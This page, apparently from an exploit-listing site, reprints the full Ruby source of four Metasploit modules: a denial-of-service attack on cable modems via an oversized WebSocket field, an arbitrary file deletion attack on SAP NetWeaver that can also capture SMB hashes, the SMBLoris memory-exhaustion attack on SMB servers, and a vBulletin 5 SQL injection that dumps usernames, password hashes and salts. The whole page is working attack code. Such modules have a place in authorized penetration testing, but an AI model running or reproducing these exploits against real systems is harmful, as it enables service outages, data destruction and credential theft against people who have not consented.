Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'eventmachine' require 'faye/websocket' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => '"Cablehaunt" Cable Modem WebSocket DoS', 'Description' => %q{ There exists a buffer overflow vulnerability in certain Cable Modem Spectrum Analyzer interfaces. This overflow is exploitable, but since an exploit would differ between every make, model, and firmware version (which also differs from ISP to ISP), this module simply causes a Denial of Service to test if the vulnerability is present. }, 'Author' => [ 'Alexander Dalsgaard Krog (Lyrebirds)', # Original research, discovery, and PoC 'Jens Hegner Stærmose (Lyrebirds)', # Original research, discovery, and PoC 'Kasper Kohsel Terndrup (Lyrebirds)', # Original research, discovery, and PoC 'Simon Vandel Sillesen (Independent)', # Original research, discovery, and PoC 'Nicholas Starke' # msf module ], 'References' => [ ['CVE', '2019-19494'], ['EDB', '47936'], ['URL', 'https://cablehaunt.com/'], ['URL', 'https://github.com/Lyrebirds/sagemcom-fast-3890-exploit'] ], 'DisclosureDate' => '2020-01-07', 'License' => MSF_LICENSE, 'Notes' => { 'Stability' => [CRASH_SERVICE_DOWN], 'SideEffects' => [IOC_IN_LOGS], 'Reliability' => [] } ) ) register_options( [ Opt::RHOST('192.168.100.1'), Opt::RPORT(8080), OptString.new('WS_USERNAME', [true, 'WebSocket connection basic auth username', 'admin']), OptString.new('WS_PASSWORD', [true, 'WebSocket connection basic auth password', 'password']), OptInt.new('TIMEOUT', [true, 'Time to wait for response', 15]) ] ) deregister_options('Proxies') deregister_options('VHOST') deregister_options('SSL') end def run res = send_request_cgi({ 'method' => 'GET', 'uri' => '/', 'authorization' => basic_auth(datastore['WS_USERNAME'], datastore['WS_PASSWORD']) }) fail_with(Failure::Unreachable, 'Cannot Connect to Cable Modem Spectrum Analyzer Web Service') if res.nil? fail_with(Failure::Unknown, 'Credentials were incorrect') if res.code != 200 @succeeded = false EM.run do print_status("Attempting Connection to #{datastore['RHOST']}") driver = Faye::WebSocket::Client.new("ws://#{datastore['RHOST']}:#{datastore['RPORT']}/Frontend", ['rpc-frontend']) driver.on :open do print_status('Opened connection') EM::Timer.new(1) do print_status('Sending payload') payload = Rex::Text.rand_text_alphanumeric(7000..8000) driver.send({ jsonrpc: '2.0', method: 'Frontend::GetFrontendSpectrumData', params: { coreID: 0, fStartHz: payload, fStopHz: 1000000000, fftSize: 1024, gain: 1 }, id: '0' }.to_json) rescue StandardError fail_with(Failure::Unreachable, 'Could not establish websocket connection') end end EM::Timer.new(10) do print_status('Checking Modem Status') begin res = send_request_cgi({ 'method' => 'GET', 'uri' => '/' }) if res.nil? @succeeded = true print_status('Cable Modem unreachable') else fail_with(Failure::Unknown, 'Host still reachable') end rescue StandardError @succeeded = true print_status('Cable Modem unreachable') end end EM::Timer.new(datastore['TIMEOUT']) do EventMachine.stop if @succeeded print_good('Exploit delivered and cable modem unreachable.') else fail_with(Failure::Unknown, 'Unknown failure occurred') end end end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## ## # This module is based on, inspired by, or is a port of a plugin available in # the Onapsis Bizploit Opensource ERP Penetration Testing framework - # http://www.onapsis.com/research-free-solutions.php. # Mariano Nunez (the author of the Bizploit framework) helped me in my efforts # in producing the Metasploit modules and was happy to share his knowledge and # experience - a very cool guy. # # The following guys from ERP-SCAN deserve credit for their contributions - # Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and # Dmitry Evdokimov. # # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis # who have Beta tested the modules and provided excellent feedback. Some people # just seem to enjoy hacking SAP :) ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'SAP SOAP EPS_DELETE_FILE File Deletion', 'Description' => %q{ This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP RFC Service, to delete arbitrary files on the remote file system. The module can also be used to capture SMB hashes by using a fake SMB share as DIRNAME. }, 'References' => [ [ 'OSVDB', '74780' ], [ 'URL', 'http://dsecrg.com/pages/vul/show.php?id=331' ], [ 'URL', 'https://launchpad.support.sap.com/#/notes/1554030' ] ], 'Author' => [ 'Alexey Sintsov', # Vulnerability discovery 'nmonkee' # Metasploit module ], 'License' => MSF_LICENSE ) register_options([ Opt::RPORT(8000), OptString.new('CLIENT', [true, 'SAP Client', '001']), OptString.new('HttpUsername', [true, 'Username', 'SAP*']), OptString.new('HttpPassword', [true, 'Password', '06071992']), OptString.new('DIRNAME', [true, 'Directory Path which contains the file to delete', '/tmp']), OptString.new('FILENAME', [true, 'Filename to delete', 'msf.txt']) ]) end def run_host(ip) data = '<?xml version="1.0" encoding="utf-8" ?>' data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" ' data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" ' data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">' data << '<SOAP-ENV:Header/>' data << '<SOAP-ENV:Body>' data << '<EPS_DELETE_FILE xmlns="urn:sap-com:document:sap:rfc:functions">' data << '<DIR_NAME>' + datastore['DIRNAME'] + '</DIR_NAME>' data << '<FILE_NAME>' + datastore['FILENAME'] + '</FILE_NAME>' data << '<IV_LONG_DIR_NAME></IV_LONG_DIR_NAME>' data << '<IV_LONG_FILE_NAME></IV_LONG_FILE_NAME>' data << '</EPS_DELETE_FILE>' data << '</SOAP-ENV:Body>' data << '</SOAP-ENV:Envelope>' begin vprint_status("#{rhost}:#{rport} - Sending request to delete #{datastore['FILENAME']} at #{datastore['DIRNAME']}") res = send_request_cgi({ 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']), 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], 'ctype' => 'text/xml; charset=UTF-8', 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', }, 'vars_get' => { 'sap-client' => datastore['CLIENT'], 'sap-language' => 'EN' } }) if res and res.code == 200 and res.body =~ /EPS_DELETE_FILE.Response/ and res.body.include?(datastore['FILENAME']) and res.body.include?(datastore['DIRNAME']) print_good("#{rhost}:#{rport} - File #{datastore['FILENAME']} at #{datastore['DIRNAME']} successfully deleted") elsif res vprint_error("#{rhost}:#{rport} - Response code: " + res.code.to_s) vprint_error("#{rhost}:#{rport} - Response message: " + res.message.to_s) vprint_error("#{rhost}:#{rport} - Response body: " + res.body.to_s) if res.body end rescue ::Rex::ConnectionError print_error("#{rhost}:#{rport} - Unable to connect") return end end end </code></pre>

<pre><code>#!/usr/bin/env ruby require 'socket' require 'metasploit' require 'bindata' class NbssHeader < BinData::Record endian :little uint8 :message_type bit7 :flags bit17 :message_length end metadata = { name: 'SMBLoris NBSS Denial of Service', description: %q{ The SMBLoris attack consumes large chunks of memory in the target by sending SMB requests with the NetBios Session Service(NBSS) Length Header value set to the maximum possible value. By keeping these connections open and initiating large numbers of these sessions, the memory does not get freed, and the server grinds to a halt. This vulnerability was originally disclosed by Sean Dillon and Zach Harding. DISCALIMER: This module opens a lot of simultaneous connections. Please check your system's ULIMIT to make sure it can handle it. This module will also run continuously until stopped. }, authors: [ 'thelightcosine', 'Adam Cammack <adam_cammack[at]rapid7.com>' ], date: '2017-06-29', references: [ { type: 'url', ref: 'https://web.archive.org/web/20170804072329/https://smbloris.com/' }, { type: 'aka', ref: 'SMBLoris'} ], type: 'dos', options: { rhost: {type: 'address', description: 'The target address', required: true, default: nil}, rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445}, } } def run(args) header = NbssHeader.new header.message_length = 0x01FFFF last_reported = 0 warned = false n_loops = 0 sockets = [] target = Addrinfo.tcp(args[:rhost], args[:rport].to_i) Metasploit.logging_prefix = "#{target.inspect_sockaddr} - " while true do begin sockets.delete_if do |s| s.closed? end nsock = target.connect(timeout: 360) nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true) nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5)) nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10)) nsock.setsockopt(Socket::Option.linger(true, 60)) nsock.write(header.to_binary_s) sockets << nsock n_loops += 1 if last_reported != sockets.length if n_loops % 100 == 0 last_reported = sockets.length Metasploit.log "#{sockets.length} socket(s) open", level: 'info' end elsif n_loops % 1000 == 0 Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info' end rescue Interrupt break sockets.each &:close rescue Errno::EMFILE Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing your system limits.", level: 'warning' unless warned warned = true sockets.slice(0).close rescue Exception => e Metasploit.log "Exception sending packet: #{e.message}", level: 'error' end end end if __FILE__ == $PROGRAM_NAME Metasploit.run(metadata, method(:run)) end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'vBulletin Password Collector via nodeid SQL Injection', 'Description' => %q{ This module exploits a SQL injection vulnerability found in vBulletin 5 that has been used in the wild since March 2013. This module can be used to extract the web application's usernames and hashes, which could be used to authenticate into the vBulletin admin control panel. }, 'References' => [ [ 'CVE', '2013-3522' ], [ 'OSVDB', '92031' ], [ 'EDB', '24882' ], [ 'BID', '58754' ], [ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ] ], 'Author' => [ 'Orestis Kourides', # Vulnerability discovery and PoC 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'DisclosureDate' => '2013-03-24' )) register_options( [ OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']), OptInt.new("NODE", [false, 'Valid Node ID']), OptInt.new("MINNODE", [true, 'Valid Node ID', 1]), OptInt.new("MAXNODE", [true, 'Valid Node ID', 100]) ]) end def exists_node?(id) mark = Rex::Text.rand_text_alpha(8 + rand(5)) result = do_sqli(id, "select '#{mark}'") if result and result =~ /#{mark}/ return true end return false end def brute_force_node min = datastore["MINNODE"] max = datastore["MAXNODE"] if min > max print_error("MINNODE can't be major than MAXNODE") return nil end for node_id in min..max if exists_node?(node_id) return node_id end end return nil end def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 print_status("Brute forcing to find a valid node id...") return brute_force_node end print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else return nil end end # session maybe isn't needed, unauthenticated def do_sqli(node, query) mark = Rex::Text.rand_text_alpha(5 + rand(3)) random_and = Rex::Text.rand_text_numeric(4) injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) " injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) " injection << "AND (#{random_and}=#{random_and}" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"), 'vars_post' => { 'nodeid' => "#{node}#{injection}", } }) unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/ return nil end data = "" if res.body.to_s =~ /#{mark}(.*)#{mark}/ data = $1 end return data end def get_user_data(node_id, user_id) user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}") pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}") salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}") return [user, pass, salt] end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "index.php") }) if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/ if get_node # Multiple factors determine this LOOKS vulnerable return Msf::Exploit::CheckCode::Appears else # Not enough information about the vuln state, but at least we know this is vbulletin return Msf::Exploit::CheckCode::Detected end end Msf::Exploit::CheckCode::Safe end def report_cred(opts) service_data = { address: opts[:ip], port: opts[:port], service_name: opts[:service_name], protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :nonreplayable_hash, jtr_format: 'md5' }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end def run print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? print_error("node id not found") return end print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.blank? print_error("Error exploiting sqli") return end count_users = data.to_i print_good("#{count_users} users found. Collecting credentials...") users_table = Rex::Text::Table.new( 'Header' => 'vBulletin Users', 'Indent' => 1, 'Columns' => ['Username', 'Password Hash', 'Salt'] ) for i in 0..count_users user = get_user_data(node_id, i) unless user.join.empty? report_cred( ip: rhost, port: rport, user: user[0], password: user[1], service_name: (ssl ? "https" : "http"), proof: "salt: #{user[2]}" ) users_table << user end end if users_table.rows.length > 0 print_good("#{users_table.rows.length.to_s} credentials successfully collected") print_line(users_table.to_s) else print_error("Unfortunately the module was unable to extract any credentials") end end end </code></pre>